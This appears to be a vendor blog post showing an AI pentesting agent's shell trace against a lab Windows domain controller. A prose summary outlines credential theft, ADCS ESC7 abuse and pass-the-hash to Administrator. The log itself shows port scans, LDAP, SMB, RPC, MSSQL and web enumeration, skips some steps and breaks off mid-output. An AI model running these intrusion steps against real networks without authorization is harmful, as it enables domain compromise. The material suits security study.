Co-Piloting an AI Pentester to hack a Domain Controller

At Vulnetic, we are super excited to show the world our first public trace. We can see the capabilities of an autonomous agent with occasional pokes from a user. Although it is an option, we did not inject a new task request during this assessment as Sable was spot on with deducing throughout the penetration test.

RustScan/Nmap identified a Windows Server 2019 Domain Controller exposing DNS/LDAP/Kerberos/SMB/WinRM/IIS and MSSQL. Anonymous LDAP/SMB/RPC were locked down, but MSSQL probing plus xpdirtree exposed a website backup in C:\inetpub\wwwroot; extracting it revealed an .old-conf.xml with LDAP creds. Those creds worked over WinRM for a foothold as a domain user (user flag retrieved). Certipy then mapped ADCS and flagged an ESC7 risk (dangerous ManageCA rights on the enterprise CA). Using those CA rights, the operator enabled a template, submitted and force-issued a certificate for Administrator and retrieved an administrator.pfx, but privilege escalation stalled due to Kerberos clock-skew errors. Despite PKINIT failing due to clock skew, the Administrator NTLM hash was used directly with Evil-WinRM (-H) to obtain an Administrator shell and read root.txt.

Try it out at Vulnetic.ai — The AI Pentester

shell:~$ rustscan -a 10.129.209.100 --ulimit 5000 -- -sC -sV .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ { { }{ { / } / {} \ | | | | .-. \| {} |.-.} } | | .-.} }\ }/ /\ \| |\ | -' -'-----'----' -' ----' ---' -' -'-' -' The Modern Day Port Scanner. : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- I scanned my computer so many times, it thinks we're dating. [~] The config file is expected to be at "/home/pythonpty/.rustscan.toml" [~] Automatically increasing ulimit value to 5000. Open 10.129.209.100:3269 Open 10.129.209.100:3268 Open 10.129.209.100:139 Open 10.129.209.100:135 Open 10.129.209.100:80 Open 10.129.209.100:53 Open 10.129.209.100:88 Open 10.129.209.100:464 Open 10.129.209.100:389 Open 10.129.209.100:445 Open 10.129.209.100:593 Open 10.129.209.100:636 Open 10.129.209.100:1433 Open 10.129.209.100:5985 Open 10.129.209.100:9389 Open 10.129.209.100:49667 Open 10.129.209.100:49697 Open 10.129.209.100:49694 Open 10.129.209.100:49729 Open 10.129.209.100:49739 Open 10.129.209.100:49693 [~] Starting Script(s) [] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sC -sV" on ip 10.129.209.100 Depending on the complexity of the script, results may take some time to appear. [~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-01 00:44 UTC NSE: Loaded 156 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 00:44 Completed NSE at 00:44, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 00:44 Completed NSE at 00:44, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 00:44 Completed NSE at 00:44, 0.00s elapsed Initiating Ping Scan at 00:44 Scanning 10.129.209.100 [4 ports] Completed Ping Scan at 00:44, 0.09s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 00:44 Completed Parallel DNS resolution of 1 host. at 00:44, 0.05s elapsed DNS resolution of 1 IPs took 0.05s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 00:44 Scanning 10.129.209.100 [21 ports] Discovered open port 445/tcp on 10.129.209.100 Discovered open port 3269/tcp on 10.129.209.100 Discovered open port 593/tcp on 10.129.209.100 Discovered open port 464/tcp on 10.129.209.100 Discovered open port 53/tcp on 10.129.209.100 Discovered open port 3268/tcp on 10.129.209.100 Discovered open port 135/tcp on 10.129.209.100 Discovered open port 80/tcp on 10.129.209.100 Discovered open port 139/tcp on 10.129.209.100 Discovered open port 389/tcp on 10.129.209.100 Discovered open port 49693/tcp on 10.129.209.100 Discovered open port 9389/tcp on 10.129.209.100 Discovered open port 5985/tcp on 10.129.209.100 Discovered open port 1433/tcp on 10.129.209.100 Discovered open port 88/tcp on 10.129.209.100 Discovered open port 49697/tcp on 10.129.209.100 Discovered open port 49729/tcp on 10.129.209.100 Discovered open port 49667/tcp on 10.129.209.100 Discovered open port 636/tcp on 10.129.209.100 Discovered open port 49694/tcp on 10.129.209.100 Discovered open port 49739/tcp on 10.129.209.100 Completed SYN Stealth Scan at 00:44, 0.11s elapsed (21 total ports) Initiating Service scan at 00:44 Scanning 21 services on 10.129.209.100 Completed Service scan at 00:45, 60.04s elapsed (21 services on 1 host) NSE: Script scanning 10.129.209.100. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 00:45 NSE Timing: About 99.97% done; ETC: 00:45 (0:00:00 remaining) Completed NSE at 00:45, 40.16s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 00:45 Completed NSE at 00:45, 1.66s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 00:45 Completed NSE at 00:45, 0.00s elapsed Nmap scan report for 10.129.209.100 Host is up, received echo-reply ttl 126 (0.033s latency). Scanned at 2025-08-01 00:44:17 UTC for 102s PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 126 Simple DNS Plus 80/tcp open tcpwrapped syn-ack ttl 126 |http-server-header: Microsoft-IIS/10.0 |http-title: [REDACTED] | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST | Potentially risky methods: TRACE 88/tcp open kerberos-sec syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2025-08-01 07:44:23Z) 135/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 126 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain:[REDACTED]., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.[REDACTED] | Issuer: commonName=[REDACTED]-DC01-CA/domainComponent=[REDACTED] | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-08-30T17:08:51 | Not valid after: 2122-07-27T10:31:04 | MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1 | SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a | -----BEGIN CERTIFICATE----- [REDACTED] |-----END CERTIFICATE----- |ssl-date: 2025-08-01T07:45:59+00:00; +7h00m00s from scanner time. 445/tcp open microsoft-ds? syn-ack ttl 126 464/tcp open kpasswd5? syn-ack ttl 126 593/tcp open ncacnhttp syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: [REDACTED], Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.[REDACTED] | Issuer: commonName=[REDACTED]-DC01-CA/domainComponent=[REDACTED] | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-08-30T17:08:51 | Not valid after: 2122-07-27T10:31:04 | MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1 | SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a | -----BEGIN CERTIFICATE----- | [REDACTED] |-----END CERTIFICATE----- |ssl-date: 2025-08-01T07:45:58+00:00; +6h59m59s from scanner time. 1433/tcp open ms-sql-s syn-ack ttl 126 Microsoft SQL Server 2019 15.00.2000.00; RTM |ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug) |ms-sql-info: ERROR: Script execution failed (use -d to debug) | ssl-cert: Subject: commonName=SSLSelfSignedFallback | Issuer: commonName=SSLSelfSignedFallback | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2025-08-01T07:42:45 | Not valid after: 2055-08-01T07:42:45 | MD5: d6b0:7c12:96d4:8269:1a61:fffb:2af2:0a76 | SHA-1: a1b2:d9c0:9013:5e5c:bf38:a57b:2698:35ff:5756:c54a | -----BEGIN CERTIFICATE----- | [REDACTED] |-----END CERTIFICATE----- |ssl-date: 2025-08-01T07:45:59+00:00; +7h00m00s from scanner time. 3268/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: [REDACTED], Site: Default-First-Site-Name) |ssl-date: 2025-08-01T07:45:59+00:00; +7h00m00s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.[REDACTED] | Issuer: commonName=[REDACTED]-DC01-CA/domainComponent=[REDACTED] | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-08-30T17:08:51 | Not valid after: 2122-07-27T10:31:04 | MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1 | SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a | -----BEGIN CERTIFICATE----- | [REDACTED] |-----END CERTIFICATE----- 3269/tcp open ssl/ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: [REDACTED], Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.[REDACTED] | Issuer: commonName=[REDACTED]-DC01-CA/domainComponent=[REDACTED] | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-08-30T17:08:51 | Not valid after: 2122-07-27T10:31:04 | MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1 | SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a | -----BEGIN CERTIFICATE----- [REDACTED] |-----END CERTIFICATE----- |ssl-date: 2025-08-01T07:45:58+00:00; +6h59m59s from scanner time. 5985/tcp open http syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |http-server-header: Microsoft-HTTPAPI/2.0 |http-title: Not Found 9389/tcp open mc-nmf syn-ack ttl 126 .NET Message Framing 49667/tcp open unknown syn-ack ttl 126 49693/tcp open ncacnhttp syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0 49694/tcp open unknown syn-ack ttl 126 49697/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC 49729/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC 49739/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m58s | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 15859/tcp): CLEAN (Timeout) | Check 2 (port 56221/tcp): CLEAN (Timeout) | Check 3 (port 24779/udp): CLEAN (Timeout) | Check 4 (port 45202/udp): CLEAN (Timeout) | 0/4 checks are positive: Host is CLEAN or ports are blocked | smb2-security-mode: | 3:1:1: | Message signing enabled and required | smb2-time: | date: 2025-08-01T07:45:18 | startdate: N/A NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 00:45 Completed NSE at 00:45, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 00:45 Completed NSE at 00:45, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 00:45 Completed NSE at 00:45, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 102.65 seconds Raw packets sent: 25 (1.076KB) | Rcvd: 22 (952B) shell:~$ # Adding domain and hostname to /etc/hosts for proper resolution shell:~$ echo '10.129.209.100 [REDACTED] dc01.[REDACTED]' | sudo tee -a /etc/hosts 10.129.209.100 [REDACTED] dc01.[REDACTED] shell:~$ # Checking web server on port 80 for initial reconnaissance shell:~$ curl -i http://[REDACTED] HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Thu, 27 Jul 2023 16:02:39 GMT Accept-Ranges: bytes ETag: "1c67a5c4a3c0d91:0" Server: Microsoft-IIS/10.0 Date: Fri, 01 Aug 2025 07:46:26 GMT Content-Length: 18203

It is a long established fact that a reader will be distracted by the readable content of a page when looking

It is a long established fact that a reader will be distracted by the readable content of a page when looking

It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. Many desktop publishing packages and web page editors now use Lorem Ipsum as their

It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content t,

It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like

It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like now use Lorem Ipsum as their default model text,

It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like

It is a long established fact that a reader will be distracted by the readable content of a page

shell:~$ ldapsearch -H ldap://10.129.209.100 -x -b "DC=[REDACTED],DC=[REDACTED]" -s sub "(objectClass=)" | head -50 # extended LDIF # # LDAPv3 # base with scope subtree # filter: (objectClass=) # requesting: ALL # # search result search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C090CF4, comment: In order to perform this opera tion a successful bind must be completed on the connection., data 0, v4563 # numResponses: 1 shell:~$ # The anonymous LDAP bind failed, let's try with null credentials to see if we can enumerate the naming context shell:~$ ldapsearch -H ldap://10.129.209.100 -x -b "" -s base "(objectClass=)" namingcontexts # extended LDIF # # LDAPv3 # base < with scope baseObject # filter: (objectClass=) # requesting: namingcontexts # # dn: namingcontexts: DC=[REDACTED],DC=[REDACTED] namingcontexts: CN=Configuration,DC=[REDACTED], DC=[REDACTED] namingcontexts: CN=Schema,CN=Configuration,DC=[REDACTED],DC=[REDACTED] namingcontexts: DC=DomainDnsZones,DC=[REDACTED],DC=[REDACTED] namingcontexts: DC=ForestDnsZones,DC=[REDACTED],DC=[REDACTED] # search result search: 2 result: 0 Success # numResponses: 2 # numEntries: 1 shell:~$ # Good, we confirmed the domain structure. Let's try SMB null session enumeration since LDAP anonymous binding failed shell:~$ smbclient -L //10.129.209.100 -N Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available shell:~$ # Let's try to access the shares without authentication to see what we can enumerate shell:~$ smbclient //10.129.209.100/SYSVOL -N Try "help" to get a list of possible commands. smb: \ ls NTSTATUSACCESSDENIED listing \ smb: \ exit shell:~$ # Try to enumerate SMB shares with guest account or check for null session access to IPC$ shell:~$ smbclient //10.129.209.100/IPC$ -N Try "help" to get a list of possible commands. smb: \ exit shell:~$ # Let's try using netexec to enumerate SMB shares and check for null sessions more thoroughly shell:~$ netexec smb 10.129.209.100 --shares [] First time use detected [] Creating home directory structure [] Creating missing folder logs [] Creating missing folder modules [] Creating missing folder workspaces [] Creating missing folder obfuscatedscripts [] Creating missing folder screenshots [] Creating missing folder logs/sam [] Creating missing folder logs/lsa [] Creating missing folder logs/ntds [] Creating missing folder logs/dpapi [] Creating default workspace [] Initializing RDP protocol database [] Initializing NFS protocol database [] Initializing SSH protocol database [] Initializing FTP protocol database [] Initializing WMI protocol database [] Initializing LDAP protocol database [] Initializing WINRM protocol database [] Initializing VNC protocol database [] Initializing MSSQL protocol database [] Initializing SMB protocol database [] Copying default configuration file SMB 10.129.209.100 445 DC01 [] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:[REDACTED]) (signing:True) (SMBv1:False) SMB 10.129.209.100 445 DC01 [-] Error enumerating shares: STATUSUSERSESSIONDELETED shell:~$ # Let's try to enumerate users through RPC null session since SMB shares aren't accessible shell:~$ rpcclient -U "" -N 10.129.209.100 rpcclient $ enumdomusers result was NTSTATUSACCESSDENIED rpcclient $ exit shell:~$ # Anonymous LDAP and SMB enumeration failed. Let's explore the web application for potential information disclosure or default credentials shell:~$ gobuster dir -u http://10.129.209.100 -w /usr/share/wordlists/directory-list-2.3-medium.txt -x php,asp,aspx,html,txt -t 20 =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.129.209.100 [+] Method: GET [+] Threads: 20 [+] Wordlist: /usr/share/wordlists/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: txt,php,asp,aspx,html [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /images (Status: 301) [Size: 152] [-- http://10.129.209.100/images/] /js (Status: 301) [Size: 148] [-- http://10.129.209.100/js/] /css (Status: 301) [Size: 149] [-- http://10.129.209.100/css/] /contact.html (Status: 200) [Size: 5317] /about.html (Status: 200) [Size: 5386] /Images (Status: 301) [Size: 152] [-- http://10.129.209.100/Images/] /index.html (Status: 200) [Size: 18203] /service.html (Status: 200) [Size: 7900] /CSS (Status: 301) [Size: 149] [-- http://10.129.209.100/CSS/] /JS (Status: 301) [Size: 148] [-- http://10.129.209.100/JS/] /Js (Status: 301) [Size: 148] [-- http://10.129.209.100/Js/] /Css (Status: 301) [Size: 149] [-- http://10.129.209.100/Css/] /About.html (Status: 200) [Size: 5386] /Service.html (Status: 200) [Size: 7900] /Contact.html (Status: 200) [Size: 5317] /IMAGES (Status: 301) [Size: 152] [-- http://10.129.209.100/IMAGES/] /Index.html (Status: 200) [Size: 18203] /ABOUT.html (Status: 200) [Size: 5386] /CONTACT.html (Status: 200) [Size: 5317] Progress: 89407 / 180000 (49.67%)Killed shell:~$ ^C shell:~$ # The user wants you to pivot the assessment, starting with the instruction below. shell:~$ # Thats good enough shell:~$ # Let's check if there are any common backup files or configuration files on the web server that might contain credentials shell:~$ curl -s http://10.129.209.100/web.config

404 - File or directory not found. The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.

shell:~$ curl -s http://10.129.209.100/contact.html | grep -iE '(email|@|username|user|administrator|admin|manager|staff|employee)' && echo '--- ABOUT PAGE ---' && curl -s http://10.129.209.100/about.html | grep -iE '(email|@|username|user| administrator|admin|manager|staff|employee)' [REDACTED] [REDACTED]

--- ABOUT PAGE --- [REDACTED] [REDACTED] shell:~$ # Let me check the service.html and index.html pages for more detailed content shell:~$ curl -s http://10.129.209.100/service.html | grep -iE '(email|@|username|user|administrator|admin|manager|staff|employee|contact|team|support)' && echo '--- INDEX PAGE ---' && curl -s http://10.129.209.100/index.html | grep -iE '(e mail|@|username|user|administrator|admin|manager|staff|employee|contact|team|support)' [REDACTED] [REDACTED]

Contact Us --- INDEX PAGE --- [REDACTED] [REDACTED]

Contact Us shell:~$ # Let me examine the full HTML content of these pages to look for comments, metadata, or hidden content that might contain usernames shell:~$ curl -s http://10.129.209.100/index.html | grep -i 'comment\|

shell:~$ # Let me check for any JavaScript files or other assets that might contain usernames or configuration shell:~$ curl -s http://10.129.209.100/ | grep -oE '(src|href)="[^"]\.(js|config|xml|txt)"' | sed 's/.="//;s/".//' | while read file; do echo "Checking: $file"; curl -s "http://10.129.209.100/$file" 2/dev/null | head -20; echo; done Checking: js/jquery-3.4.1.min.js /! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license / !function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=ty peof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n [TRUNCATED JAVASCRIPT]

shell:~$ nmap -sV -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-ntlm-info 10.129.209.100 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-01 00:54 UTC Nmap scan report for 10.129.209.100 Host is up (0.034s latency). PORT STATE SERVICE VERSION 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM |ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug) |ms-sql-info: ERROR: Script execution failed (use -d to debug) |ms-sql-empty-password: ERROR: Script execution failed (use -d to debug) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.76 seconds shell:~$ # The nmap scripts failed, let's try a more direct approach with sqsh or sqlcmd to test MSSQL anonymous access shell:~$ sqsh -S 10.129.209.100 -U '' -P '' bash: sqsh: command not found shell:~$ # Let's try using impacket's mssqlclient.py to test for anonymous access shell:~$ python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py -windows-auth @10.129.209.100 python3: can't open file '/usr/share/doc/python3-impacket/examples/mssqlclient.py': [Errno 2] No such file or directory shell:~$ # Let's find the correct path for impacket mssqlclient shell:~$ find /usr -name 'mssqlclient' 2/dev/null shell:~$ # Let's check if mssqlclient.py is available in the PATH or try using netexec for MSSQL enumeration shell:~$ which mssqlclient.py /opt/venv/bin/mssqlclient.py shell:~$ # Testing MSSQL for anonymous access using impacket's mssqlclient.py shell:~$ mssqlclient.py -windows-auth @10.129.209.100 /opt/venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkgresources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkgresources.html. The pkgresources package is slated for removal as early as 2025 -11-30. Refrain from using this package or pin to Setuptools /dev/null total 8 drwxrwxrwt 1 root root 4096 Aug 1 00:55 . drwxr-xr-x 1 root root 4096 Aug 1 00:53 .. -rwxrwxrwx 1 root root 0 Jul 27 21:52 uv-setuptools-1c83b73deef05048.lock -rwxrwxrwx 1 root root 0 Jul 27 21:52 uv-setuptools-1f2a1f21faa55a73.lock -rwxrwxrwx 1 root root 0 Jul 27 21:52 uv-setuptools-25d8d505a8236b13.lock -rwxrwxrwx 1 root root 0 Jul 27 21:52 uv-setuptools-2985a796ec8e6dc4.lock -rwxrwxrwx 1 root root 0 Jul 27 21:52 uv-setuptools-66c9f410439c7987.lock -rwxrwxrwx 1 root root 0 Jul 27 21:52 uv-setuptools-6dfcb35b50630e31.lock -rwxrwxrwx 1 root root 0 Jul 27 21:52 uv-setuptools-863046399b0ad3ad.lock -rwxrwxrwx 1 root root 0 Jul 27 21:52 uv-setuptools-8dc017c7e31935d0.lock -rwxrwxrwx 1 root root 0 Jul 27 21:52 uv-setuptools-baa4afeaf58d1ed8.lock -rwxrwxrwx 1 root root 0 Jul 27 21:52 uv-setuptools-e935cd579a1141ee.lock -rwxrwxrwx 1 root root 0 Jul 27 21:52 uv-setuptools-fdcc39a9bb844b2a.lock shell:~$ # Check if ldapdomaindump created output files in current directory or home shell:~$ ls -la . && ls -la ~ && find . -name '.html' -o -name '.json' -o -name '.grep' 2/dev/null total 52 drwxr-xr-x 1 pythonpty pythonpty 4096 Aug 1 01:02 . drwxr-xr-x 1 root root 4096 Jul 27 21:52 .. -rw------- 1 root root 6168 Aug 1 01:05 .bashhistory -rw-r--r-- 1 pythonpty pythonpty 293 Jul 27 21:49 .bashrc drwxr-xr-x 3 root root 4096 Jul 27 21:52 .cache drwxr-xr-x 1 root root 4096 Jul 27 21:52 .local drwxr-xr-x 8 root root 4096 Aug 1 00:58 .nxc -rw-r--r-- 1 root root 259 Jul 27 21:52 .wget-hsts drwxr-xr-x 2 root root 4096 Aug 1 01:02 ldap total 52 drwxr-xr-x 1 pythonpty pythonpty 4096 Aug 1 01:02 . drwxr-xr-x 1 root root 4096 Jul 27 21:52 .. -rw------- 1 root root 6168 Aug 1 01:05 .bashhistory -rw-r--r-- 1 pythonpty pythonpty 293 Jul 27 21:49 .bashrc drwxr-xr-x 3 root root 4096 Jul 27 21:52 .cache drwxr-xr-x 1 root root 4096 Jul 27 21:52 .local drwxr-xr-x 8 root root 4096 Aug 1 00:58 .nxc -rw-r--r-- 1 root root 259 Jul 27 21:52 .wget-hsts drwxr-xr-x 2 root root 4096 Aug 1 01:02 ldap ./ldap/domaincomputersbyos.html ./ldap/domainusers.html ./ldap/domaingroups.html ./ldap/domainpolicy.json ./ldap/domaingroups.json ./ldap/domainusersbygroup.html ./ldap/domaincomputers.html ./ldap/domainpolicy.grep ./ldap/domaintrusts.html ./ldap/domaingroups.grep ./ldap/domaintrusts.json ./ldap/domainpolicy.html ./ldap/domainusers.grep ./ldap/domaincomputers.grep ./ldap/domainusers.json ./ldap/domaintrusts.grep ./ldap/domaincomputers.json ./.local/share/uv/python/cpython-3.13.5-linux-x8664-gnu/lib/python3.13/idlelib/help.html ./.local/share/uv/python/cpython-3.13.5-linux-x8664-gnu/lib/python3.13/site-packages/pip-24.3.1.dist-info/directurl.json ./.cache/uv/archive-v0/u4rKEaWo0ZdBmL9VoCpau/setuptools/tests/indexes/testlinkspriority/external.html ./.cache/uv/archive-v0/u4rKEaWo0ZdBmL9VoCpau/setuptools/tests/indexes/testlinkspriority/simple/foobar/index.html ./.cache/uv/archive-v0/u4rKEaWo0ZdBmL9VoCpau/setuptools/config/setuptools.schema.json ./.cache/uv/archive-v0/u4rKEaWo0ZdBmL9VoCpau/setuptools/config/distutils.schema.json ./.cache/uv/archive-v0/7xGjqTeZcwCl5ZCABPKx-/poetry/core/spdx/data/licenses.json ./.cache/uv/archive-v0/7xGjqTeZcwCl5ZCABPKx-/poetry/core/json/schemas/project-schema.json ./.cache/uv/archive-v0/7xGjqTeZcwCl5ZCABPKx-/poetry/core/json/schemas/poetry-schema.json ./.cache/uv/git-v0/checkouts/57c132c33ce2f0fb/1547f53/dev/codecov.json shell:~$ # Analyze the ldapdomaindump results starting with domain users shell:~$ cat ./ldap/domainusers.json | jq '.' | head -50 [ { "attributes": { "accountExpires": [ "9999-12-31 23:59:59.999999+00:00" ], "badPasswordTime": [ "1601-01-01 00:00:00+00:00" ], "badPwdCount": [ 0 ], "cn": [ "[REDACTED]" ], "codePage": [ 0 ], "countryCode": [ 0 ], "dSCorePropagationData": [ "1601-01-01 00:00:00+00:00" ], "distinguishedName": [ "CN=[REDACTED],CN=Users,DC=[REDACTED],DC=[REDACTED]" ], "instanceType": [ 4 ], "lastLogoff": [ "1601-01-01 00:00:00+00:00" ], "lastLogon": [ "1601-01-01 00:00:00+00:00" ], "lastLogonTimestamp": [ "2025-08-01 08:02:32.683865+00:00" ], "logonCount": [ 0 ], "name": [ "[REDACTED]" ], "objectCategory": [ "CN=Person,CN=Schema,CN=Configuration,DC=[REDACTED],DC=[REDACTED]" ], "objectClass": [ "top", jq: error: writing output failed: Broken pipe shell:~$ # Extract key user information from the JSON data shell:~$ cat ./ldap/domainusers.json | jq '.[] | {name: .attributes.name[0], distinguishedName: .attributes.distinguishedName[0], memberOf: .attributes.memberOf?, description: .attributes.description?, lastLogonTimestamp: .attributes.lastL ogonTimestamp?}' { "name": "[REDACTED]", "distinguishedName": "CN=[REDACTED],CN=Users,DC=[REDACTED],DC=[REDACTED]", "memberOf": null, "description": null, "lastLogonTimestamp": [ "2025-08-01 08:02:32.683865+00:00" ] } { "name": "[REDACTED]", "distinguishedName": "CN=[REDACTED],CN=Users,DC=[REDACTED],DC=[REDACTED]", "memberOf": null, "description": null, "lastLogonTimestamp": null } { "name": "[REDACTED]", "distinguishedName": "CN=[REDACTED],CN=Users,DC=[REDACTED],DC=[REDACTED]", "memberOf": null, "description": null, "lastLogonTimestamp": null } { "name": "[REDACTED]", "distinguishedName": "CN=[REDACTED],CN=Users,DC=[REDACTED],DC=[REDACTED]", "memberOf": [ "CN=Remote Management Users,CN=Builtin,DC=[REDACTED],DC=[REDACTED]" ], "description": null, "lastLogonTimestamp": [ "2023-09-22 19:31:01.351803+00:00" ] } { "name": "Ryan", "distinguishedName": "CN=[REDACTED],CN=Users,DC=[REDACTED],DC=[REDACTED]", "memberOf": null, "description": null, "lastLogonTimestamp": null } { "name": "Cheng", "distinguishedName": "CN=[REDACTED],CN=Users,DC=[REDACTED],DC=[REDACTED]", "memberOf": null, "description": null, "lastLogonTimestamp": null } { "name": "Zhong", "distinguishedName": "CN=[REDACTED],CN=Users,DC=[REDACTED],DC=[REDACTED]", "memberOf": null, "description": null, "lastLogonTimestamp": null } { "name": "krbtgt", "distinguishedName": "CN=krbtgt,CN=Users,DC=[REDACTED],DC=[REDACTED]", "memberOf": [ "CN=Denied RODC Password Replication Group,CN=Users,DC=[REDACTED],DC=[REDACTED]" ], "description": [ "Key Distribution Center Service Account" ], "lastLogonTimestamp": null } { "name": "Guest", "distinguishedName": "CN=Guest,CN=Users,DC=[REDACTED],DC=[REDACTED]", "memberOf": [ "CN=Guests,CN=Builtin,DC=[REDACTED],DC=[REDACTED]" ], "description": [ "Built-in account for guest access to the computer/domain" ], "lastLogonTimestamp": [ "2025-08-01 07:47:40.820032+00:00" ] } { "name": "Administrator", "distinguishedName": "CN=Administrator,CN=Users,DC=[REDACTED],DC=[REDACTED]", "memberOf": [ "CN=Group Policy Creator Owners,CN=Users,DC=[REDACTED],DC=[REDACTED]", "CN=Domain Admins,CN=Users,DC=[REDACTED],DC=[REDACTED]", "CN=Enterprise Admins,CN=Users,DC=[REDACTED],DC=[REDACTED]", "CN=Schema Admins,CN=Users,DC=[REDACTED],DC=[REDACTED]", "CN=Administrators,CN=Builtin,DC=[REDACTED],DC=[REDACTED]" ], "description": [ "Built-in account for administering the computer/domain" ], "lastLogonTimestamp": [ "2025-08-01 07:43:16.320072+00:00" ] } shell:~$ # Check domain groups to understand privilege structure shell:~$ cat ./ldap/domaingroups.json | jq '.[] | {name: .attributes.name[0], distinguishedName: .attributes.distinguishedName[0], member: .attributes.member?, description: .attributes.description?}' { "name": "SQLServer2005SQLBrowserUser$DC01", "distinguishedName": 